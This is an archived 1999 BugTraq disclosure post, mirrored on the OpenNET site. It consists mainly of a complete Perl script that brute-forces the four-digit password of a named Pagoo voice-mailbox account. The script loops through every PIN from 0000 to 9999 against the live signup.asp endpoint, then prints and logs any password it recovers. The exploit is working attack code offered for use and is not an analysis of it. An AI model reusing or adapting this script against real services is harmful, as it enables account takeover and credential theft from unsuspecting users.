The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Хинт: На opennet существует множество средств обнаружения новых версий программ. Присутствует сводная таблица.
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

hhp: Pagoo VMB remote exploit.


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Tue, 22 Jun 1999 13:06:05 -0400
From: Elaich Of Hhp <hhp@NS.SUSPEND.NET>
To: BUGTRAQ@netspace.org
Subject: hhp: Pagoo VMB remote exploit.

#!/usr/bin/perl
#
#       (hhp) hhp-pagoo.pl (hhp)
#        by: elaich of the hhp.
#         http://hhp.hemp.net/
#                 '99'
#
# The (Pagoo Internet voice MailBox) exploit.
# Available at http://www.pagoo.com/
#
# This exploit will extract the password to
# the specified PagooID you specify.
#
# The vulnerability comes into play when you
# connect to your UpdateForm thru signup.asp
# which  requires  your  PagooID  and your 4
# digit password.
#
# Nothing will prevent you from reconnecting
# and trying  a  new  password from 0000  in
# increments  of  1 till we reach 9999 which
# is  the  highest  password  possible...  I
# could  call  this  a  brute, but it always
# 100%  of  the  time  will  get  the passwd
# unlike a brute.
#
# Logs passwds to file: pagooids

use IO::Socket;

die "usage: $0 <PagooID>\n" unless(@ARGV == 1);
($box) = (@ARGV);

open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n";
autoflush OUT 1;

$host = "www.pagoo.com";
autoflush STDOUT 1;

sub parse
 {
  ($num) = @_;
  $url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num";

  $socket = IO::Socket::INET->new(PeerAddr => $host,
                                  PeerPort => 80,
                                     Proto => "tcp") or die "Can't connect.\n";

  print $socket "GET $url\n";
  print "Trying password: $num of 9999.\n";
  while(<$socket>)
   {
        chomp;
        if(/Password invalid/)
         {
         break;
         }
        if(/First Name/)
         {
          print "PagooID password extracted...\n";
          print "PagooID: $box / Password: $num\n";
          print OUT "PagooID: $box / Password: $num\n";
          exit 0;
         }

    }
 }
$num = '0000';
parse $num;

for($i = 0; $i <= 9999; $i++)
 {
  $num++;
  parse $num;
 }

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList